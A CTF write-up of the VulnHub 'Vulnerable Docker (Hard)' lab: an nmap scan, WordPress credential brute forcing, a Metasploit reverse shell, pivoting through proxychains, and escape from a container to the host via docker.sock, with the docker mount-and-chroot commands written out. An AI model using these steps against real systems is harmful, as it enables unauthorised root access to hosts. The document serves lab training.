CTF-Writeups/VulnHub/Vulnerable_docker_Hard.md
2021-03-26 15:22:10 +05:00

4.4 KiB

Vulnhub- Vulnerable Docker (Hard)

NMAP

nmap -p- -sC -sV 192.168.1.7

Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 22:24 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
|   2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
|   256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_  256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.15
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds

PORT 8000 (HTTP)

We can see this is a wordpress site so let's run wpscan on the site

wpscan found a user name bob we can now try brute forcing the password

Login with the credentials found

Now we can either manually upload a php reverse shell or use metasploit exploit

We didn't get a proper meterpreter shell because of web shell exploit we used so we need to generate linux payload , upload and execute on the target machine

Open another meterpreter window and configure the listener

Now commands can be run properly

Use metasploit's autoroute to do pivoting

Now we need to find what's running on docker conatiner so we can use metasploit's auxiliary/scanner/portscan/tcp module

In order to access the ports we found we need to use proxychains for that we run socks module on metasploit and use proxyfroxy to configure proxy for browser

Verify that the port is added in the /etc/porxychains.conf

We can find docker.sock on the container which means we can create another container having host machien file system mounted on it

But to upload a static binary on that container there is no utility to download a file but we do have internet avaiable on the machine so we can download docker as well but before that I downloaded python3 on the container so I could get a stabilized shell

Run apt update and then apt install python3

Download static binary and transfer it to target machine

Since we have docker.sock on our container we can list the imgaes being used

./docker -H unix:///var/run/docker.sock images

Now to mount the host file system on the container

./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host

Add your generated ssh public key in authorized_keys and then ssh on the box as root